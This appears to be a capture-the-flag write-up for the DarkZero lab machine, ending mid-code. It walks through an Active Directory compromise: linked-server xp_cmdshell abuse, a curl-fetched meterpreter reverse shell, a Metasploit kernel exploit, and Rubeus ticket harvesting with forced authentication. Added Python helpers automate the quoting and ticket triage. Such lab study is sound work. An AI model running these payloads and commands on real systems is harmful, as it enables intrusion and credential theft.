Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ nmap -sC -sV -Pn 10.129.202.136 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 22:44 UTC
Nmap scan report for 10.129.202.136
Host is up (0.28s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 18:46:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2025-10-05T18:47:47+00:00; -3h58m12s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T09:46:08
|_Not valid after: 2055-10-05T09:46:08
| ms-sql-ntlm-info:
| 10.129.202.136:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.202.136:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-05T18:47:06
|_ start_date: N/A
|_clock-skew: mean: -3h58m14s, deviation: 2s, median: -3h58m15s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.78 seconds
Let's add DC01.darkzero.htb and darkzero.htb to our /etc/hosts. Note the clock skew nmap reports (about -3h58m): Kerberos only tolerates about five minutes of skew, so sync the clock against the DC (ntpdate, or wrap commands in faketime) before any Kerberos-based step later on.
We are given credentials for john.w:
As is common in real life pentests, you will start the DarkZero box with credentials for the following account: john.w / RFulUtONCOL!
SMB
Let's start with the SMB service and check what we can access.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!'
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!' --shares
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.202.136 445 DC01 [*] Enumerated shares
SMB 10.129.202.136 445 DC01 Share Permissions Remark
SMB 10.129.202.136 445 DC01 ----- ----------- ------
SMB 10.129.202.136 445 DC01 ADMIN$ Remote Admin
SMB 10.129.202.136 445 DC01 C$ Default share
SMB 10.129.202.136 445 DC01 IPC$ READ Remote IPC
SMB 10.129.202.136 445 DC01 NETLOGON READ Logon server share
SMB 10.129.202.136 445 DC01 SYSVOL READ Logon server share
Honestly, nothing interesting here: only the default shares, all read-only.
But we can continue by enumerating the valid domain users.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ netexec smb 10.129.202.136 -u john.w -p 'RFulUtONCOL!' --users
SMB 10.129.202.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.202.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.202.136 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.202.136 445 DC01 Administrator 2025-09-10 16:42:44 0 Built-in account for administering the computer/domain
SMB 10.129.202.136 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.202.136 445 DC01 krbtgt 2025-07-29 11:40:16 0 Key Distribution Center Service Account
SMB 10.129.202.136 445 DC01 john.w 2025-07-29 15:33:53 0
SMB 10.129.202.136 445 DC01 [*] Enumerated 4 local users: darkzero
Still no interesting target here: john.w is the only non-default user.
Mssql
The machine also exposes MSSQL on 1433, a service that is usually reachable only from internal hosts rather than from the outside world. Since john.w is a domain user, we can try Windows authentication against it.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@dc01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> EXEC sp_linkedservers;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
We find a linked server, DC02.darkzero.ext, in a different domain. Note the prompt: john.w is only mapped to guest on DC01, so the interesting question is what the linked-server login mapping gives us on DC02. Let's try xp_cmdshell through the link:
SQL (darkzero\john.w guest@master)> EXECUTE('EXEC xp_cmdshell ''ping 10.10.14.12''') AT [DC02.darkzero.ext];
ERROR(DC02): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
That means xp_cmdshell is disabled in DC02's configuration. Enabling it with sp_configure/RECONFIGURE requires sysadmin (or serveradmin) on DC02, so if this works, the login the link maps us to is highly privileged there:
SQL (darkzero\john.w guest@master)> EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
It works, so we can now run OS commands on DC02:
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''whoami'';') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
NULL
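The chain above, as an added helper written for this write-up (not part of the original page, mssqlclient.py or any other tool used here): it builds the EXEC ... AT statements for one or more linked-server hops and takes care of the single-quote doubling that each hop requires, which is the usual cause of syntax errors once more than one hop is involved. The only real names are the linked server DC02.darkzero.ext from sp_linkedservers and the sp_configure/xp_cmdshell statements used above; the two-hop example with [DC01] as a second hop is illustrative and assumes such a link back exists. The recon statement answers the question the guest@master prompt raises: SYSTEM_USER and IS_SRVROLEMEMBER('sysadmin') evaluated at the far end of the link tell you which login the mapping gives you and whether RECONFIGURE will be allowed.

```python
"""Build nested linked-server EXEC ... AT statements with correct quoting.
Added example, not code from the write-up. Server names other than
DC02.darkzero.ext (from sp_linkedservers) are illustrative."""

Q = "'"


def quote_ident(name):
    """Bracket-quote a linked server name; a ']' inside an identifier is doubled."""
    return "[" + name.replace("]", "]]") + "]"


def exec_at(sql, path):
    """Wrap `sql` so it runs at the end of `path` (linked servers, outermost hop first).
    Every hop wraps the statement in EXEC ('...') AT [server], so the single quotes
    of the inner statement double once per hop: 1 -> 2 -> 4 -> 8 ..."""
    stmt = sql
    for server in reversed(path):
        stmt = f"EXEC ('{stmt.replace(Q, Q * 2)}') AT {quote_ident(server)}"
    return stmt


def recon(path):
    """Which login does the link map us to, and is it sysadmin on the far side?"""
    return exec_at("SELECT SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS sysadmin", path)


def enable_xp_cmdshell(path):
    """sp_configure/RECONFIGURE needs ALTER SETTINGS (sysadmin or serveradmin) on that server."""
    return [
        exec_at("EXEC sp_configure 'show advanced options', 1; RECONFIGURE", path),
        exec_at("EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE", path),
    ]


def run_cmd(command, path):
    """Run an OS command via xp_cmdshell at the end of the chain; quotes in the command are escaped too."""
    return exec_at(f"EXEC xp_cmdshell '{command.replace(Q, Q * 2)}'", path)


def disable_xp_cmdshell(path):
    """Put the configuration back when finished."""
    return [
        exec_at("EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE", path),
        exec_at("EXEC sp_configure 'show advanced options', 0; RECONFIGURE", path),
    ]


if __name__ == "__main__":
    hop = ["DC02.darkzero.ext"]  # the link seen in sp_linkedservers on DC01
    for stmt in [recon(hop), *enable_xp_cmdshell(hop), run_cmd("whoami", hop), *disable_xp_cmdshell(hop)]:
        print(stmt)
    # Illustrative second hop (assumes DC02 links back to DC01): watch the quotes grow 1 -> 2 -> 4.
    print(run_cmd("whoami", ["DC02.darkzero.ext", "DC01"]))
```

Paste the printed statements into the mssqlclient.py prompt one at a time; the one-hop output for run_cmd("whoami", hop) is exactly the statement used above.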
That means we can upload a reverse shell payload and execute it through the same channel.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.12 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 804 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Pull it onto the target with xp_cmdshell, with a matching multi/handler (windows/x64/meterpreter/reverse_https on port 443) waiting in msfconsole:
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''curl http://10.10.14.12/shell.exe -o C:\Programdata\shell.exe'';') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_cmdshell ''C:\Programdata\shell.exe'';') AT [DC02.darkzero.ext];
Finally you can get the reverse shell session as darkzero-ext\svc_sql
meterpreter > getuid
Server username: darkzero-ext\svc_sql
meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
darkzero-ext\svc_sql
Privilege escalation on darkzero-ext
Let's enumerate group membership and privileges.
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Honestly, nothing here helps us elevate privileges: no SeImpersonatePrivilege, just the usual service-account set.
Let's upload winPEASx64.exe to look for targets.
Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: svc_sql::darkzero-ext:1122334455667788:6528c0e45fcf35af381233d07bb32803:0101000000000000bf4f2ebb2c36dc018c811f2632980027000000000800300030000000000000000000000000300000e6c16eafef473f217bc7c06466fe13e8e9bba38a29a57485ed0d7fba490d7f300a00100000000000000000000000000000000000090000000000000000000000
=================================================================================================
We could crack this hash, but I don't think it is useful here. winPEAS did not give me any CVE details, so I switched to post/multi/recon/local_exploit_suggester.
meterpreter > sessions -i 1
[*] Session 1 is already interactive.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 172.16.20.2 - 206 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
I would only recommend the newest CVEs: these machines usually expect the most recent and most stable exploit available. After trying several of them, I found exploit/windows/local/cve_2024_30088_authz_basep to be the stable one for elevating privileges.
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 4444
LPORT => 4444
msf exploit(windows/local/cve_2024_30088_authz_basep) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1768...
Then you can get the reverse shell as administrator
Lateral movement to dc01.darkzero.htb
DC02 is a domain controller, and domain controllers are trusted for unconstrained delegation by default: any account that authenticates to DC02 with a forwardable TGT leaves a copy of that TGT in DC02's LSASS. With a high-privilege shell on DC02 we can run Rubeus in monitor mode to harvest incoming TGTs, then coerce DC01 into authenticating to us. Across a forest trust this only works if TGT delegation is permitted over the trust, which the captured DC01$ ticket below confirms.
Run Rubeus on DC02 to begin capturing:
C:\Windows\system32>.\rubeus.exe monitor /interval:10 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: TGT Monitoring
[*] Monitoring every 10 seconds for new TGTs
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : svc_sql@DARKZERO.EXT
StartTime : 10/5/2025 7:23:32 AM
EndTime : 10/5/2025 5:23:32 PM
RenewTill : 10/12/2025 7:23:32 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 8:21:22 AM
EndTime : 10/5/2025 6:21:22 PM
RenewTill : 10/12/2025 8:21:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/5/2025 8:35:20 AM
EndTime : 10/5/2025 6:35:20 PM
RenewTill : 10/12/2025 8:35:20 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 7:21:54 AM
EndTime : 10/5/2025 5:21:54 PM
RenewTill : 10/12/2025 7:21:54 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/5/2025 7:29:42 AM
EndTime : 10/5/2025 5:29:42 PM
RenewTill : 10/12/2025 7:29:42 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 7:36:10 AM
EndTime : 10/5/2025 5:21:54 PM
RenewTill : 10/12/2025 7:21:54 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IEVDCCBFCgAwIBEqEDAgEBooIEQgSCBD4oCj2Peaql3hHuGQdKoVvyKnU8IeDrbBr38DiMxaHKLQ8BLRhbEWKt5kJKyDebJQI0Qu6FQcigIWTYTYyyZnIoygFDBFRKqnwss/cvd07+qEp7/8vhRLdpTFN7sFl/RSape9fNvxnrl6MUj1glfaObTsM0wQyS0iKO6baCiWiOK39jHwAbKXMzGTSVnl30oc+fcTVyKOkA7RgoD0UZia+7Ybn5dgTX98U98rDJpwzL/kfoGZktVIDt8Y+uWZXHgkfzEgITX6Y6k9CqldnxV2AWnT8iRLxalaf3o/tT1JB4WyYNAsDbNU1DFKnAocVt+8/y8I3KOsOGg/swA4nEuBZwqTNPXIAQFUOKFQ/b7soJnNkop16OqK2rYDoOsSlc/MZ7JTGOuo0Sxhd+nrOMu9zjeoASYnQrw8QOAdbNDVzPKPOJeo3kZrG5Drs5vVsTVtxSeosXg2+1K7Irp1G+M47LDNzBLjMHdOV8wEvGCiAb6lcGCx8acL5eQoMuYDHQJZQ5fUWgMJui19Nsf3sKDW4wCERB4gNbCuSV0pk6lqjYs8H3/GoGX4MurHv2QOwzO0XNmzbsmB4XT+Q8xsJ+AmiILbd2KIX7h2tIfu2MTQu1MiHs4yqQK6xEAdzKsxmNXt1GVZNzSDx1KyoDGEq9KVs2H9NckKQaRkupsVheV3+hgB8RFKkOCcDZ+8hQMmaLi5XqvRr2O2AguKKBCO5lPTTEMl7GcvKN8Lo9Zv/85yFoz9t44/G0dbx82f0eOBuvrraX8nNhvNR60Y3wH27KvbLi4/e7ApDctJ9lcKUPgfr8s0raf36vg5tvxs86J6lWxk78mNNLK74OFcpeLB53+HT3j1gV4QZZS8JGNx8hZX1M930yjC4BL7PUHPEOGMzEPv5Ji9ePDFaINh4qX1I1G26c9qrm9rm7pKDGi/xL7lYB3oINiy4LE6enoFcV71rgre/GFbCpZCJFOtCuKvIprOOjaMq5dKJ2SAmhBduZMabFBGxnDldS7I01vhGD6Yn/HFs083I3mlcmc46swu3KYuv5BRO2xZsE3kdapfofhkYMEfjH2yMvxPQWX+TsbUFWGymryM2T4v5DAJ/mw+HVcKaUBJyxCGba87T0UpWI72XlfXhhAKyf9+A06vYDplOfMPw00jJ0z03b0545bunYl72MYfEaF6ir9s7j6zHbbCJYXBHLiDb0wK23hEmrpFIsNZsL7FfxzwzahOKDhglQQd0t6BPE/rFHYOFu5fjIksv2BYtOjTlq/QZ0loOXXdltwtvozz5PcGv6QEi2awjHEZcroSOrWdMgXtruhYlrNAUzbpB2KZZ5GVlaoo5uZZd2bu6ldT+qwic4M/HshSk6xOoKqVIqMHgrKqIXyuLChXxYJaWU0Fl+BS1HJ1iCMNcF3jPqhwqEhCG4tGZOYRnMhkMmqy1ib/00RbI2f2X7ZcijgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCyQp3m3XxlTnzHPQOpUlzKTO4/Phf2EuHsXdvJiqxKmKEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAQKEAAKURGA8yMDI1MTAwNTE0MzYxMFqmERgPMjAyNTEwMDYwMDIxNTRapxEYDzIwMjUxMDEyMTQyMTU0WqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkhUQg==
[*] Ticket cache size: 6
Next, we must force DC01 to authenticate to DC02.
A UNC path passed to xp_dirtree from our SQL shell on DC01 makes the SQL Server service on DC01 (which, as the captured ticket shows, runs under the DC01$ machine account) connect to DC02 over SMB:
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\pwn
The Rubeus monitor on DC02 then shows a new TGT for DC01$ (note the forwarded flag):
User : DC01$@DARKZERO.HTB
StartTime : 10/5/2025 10:46:15 AM
EndTime : 10/5/2025 8:46:14 PM
RenewTill : 10/12/2025 10:46:14 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDb/
...[snip]...
DUxNzQ2MTVaphEYDzIwMjUxMDA2MDM0NjE0WqcRGA8yMDI1MTAxMjE3NDYxNFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
Save the Base64 blob from the Rubeus output to dc01.kirbi.b64 (it is printed on one line thanks to /nowrap), decode it, and convert the kirbi to a ccache that Impacket can use:
cat dc01.kirbi.b64 | base64 -d > dc01.kirbi
ticketConverter.py dc01.kirbi dc01.ccache
export KRB5CCNAME=dc01.ccache
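Before converting a captured blob it is worth checking what it actually is: that it is a KRB-CRED with a cleartext EncKrbCredPart (what Rubeus and Mimikatz write as .kirbi), that the client really is DC01$@DARKZERO.HTB, that the forwarded/forwardable flags are set, and that it has not expired (mind the four-hour clock skew seen in the nmap output). The script below is an added example written for this write-up, not code from the original page, Rubeus or Impacket; it uses only the Python standard library. The sample ticket it builds is constructed for the demonstration (dummy session key and ticket cipher); only the names, times and flags mirror the DC01$ ticket shown above. Pipe a real blob on stdin to triage it.

```python
"""Triage a .kirbi (KRB-CRED) blob before converting it: client, service, flags, lifetime.
Added example, standard library only. The sample ticket is constructed, not the one captured on the box."""
import base64
import re

# RFC 4120 TicketFlags bit numbers (bit 0 is the MSB of the 32-bit string); Rubeus prints bit 15 as name_canonicalize.
FLAG_BITS = {1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy", 5: "may-postdate",
             6: "postdated", 7: "invalid", 8: "renewable", 9: "initial", 10: "pre-authent",
             11: "hw-authent", 12: "transited-policy-checked", 13: "ok-as-delegate", 15: "name_canonicalize"}


def _read_len(buf, i):
    """DER definite length at buf[i] -> (length, index of the first body byte)."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def parse(buf):
    """DER -> list of (tag, value); constructed tags hold a child list, primitive tags the raw body."""
    nodes, i = [], 0
    while i < len(buf):
        tag = buf[i]
        length, j = _read_len(buf, i + 1)
        body = buf[j:j + length]
        nodes.append((tag, parse(body) if tag & 0x20 else body))
        i = j + length
    return nodes


def ctx(children, n):
    """Children of the context-specific tag [n] inside a SEQUENCE; None if that OPTIONAL field is absent."""
    return next((v for t, v in children if t == 0xA0 + n), None)


def principal(node):
    """PrincipalName { name-type [0], name-string [1] SEQUENCE OF GeneralString } -> 'a/b'."""
    return "/".join(v.decode() for _, v in ctx(node[0][1], 1)[0][1])


def flag_names(flags):
    return [name for bit, name in FLAG_BITS.items() if flags & (1 << (31 - bit))]


def triage(b64):
    """Summarise the first KrbCredInfo of a kirbi; rejects anything that is not a cleartext KRB-CRED."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))  # tolerate a wrapped or indented paste
    cred = parse(raw)[0]
    if cred[0] != 0x76:  # KRB-CRED is [APPLICATION 22]
        raise ValueError("not a KRB-CRED (expected tag 0x76)")
    enc = ctx(cred[1][0][1], 3)[0][1]  # EncryptedData { etype [0], kvno [1], cipher [2] }
    etype = int.from_bytes(ctx(enc, 0)[0][1], "big")
    if etype != 0:
        raise ValueError(f"enc-part is encrypted with etype {etype}; not a usable kirbi")
    cred_part = parse(ctx(enc, 2)[0][1])[0]  # EncKrbCredPart [APPLICATION 29] in cleartext
    info = ctx(cred_part[1][0][1], 0)[0][1][0][1]  # ticket-info[0] -> KrbCredInfo children

    def field(n):
        return ctx(info, n)[0][1]

    return {
        "client": principal(ctx(info, 2)) + "@" + field(1).decode(),
        "service": principal(ctx(info, 9)) + "@" + field(8).decode(),
        "flags": flag_names(int.from_bytes(field(3)[1:], "big")),  # skip the BIT STRING unused-bits byte
        "start": field(5).decode(), "end": field(6).decode(), "renew_till": field(7).decode(),
    }


def _tlv(tag, body):
    """Minimal DER encoder used only to build the constructed sample (bodies under 64 KiB)."""
    n = len(body)
    ln = bytes([n]) if n < 0x80 else (b"\x81" + bytes([n]) if n < 0x100 else b"\x82" + n.to_bytes(2, "big"))
    return bytes([tag]) + ln + body


def _ctx(n, body): return _tlv(0xA0 + n, body)
def _gs(s): return _tlv(0x1B, s.encode())
def _gt(s): return _tlv(0x18, s.encode())
def _int(v): return _tlv(0x02, bytes([v]))
def _name(*parts): return _tlv(0x30, _ctx(0, _int(2)) + _ctx(1, _tlv(0x30, b"".join(map(_gs, parts)))))


def build_sample_kirbi():
    """Constructed sample: a forwarded TGT for DC01$@DARKZERO.HTB with a cleartext EncKrbCredPart.
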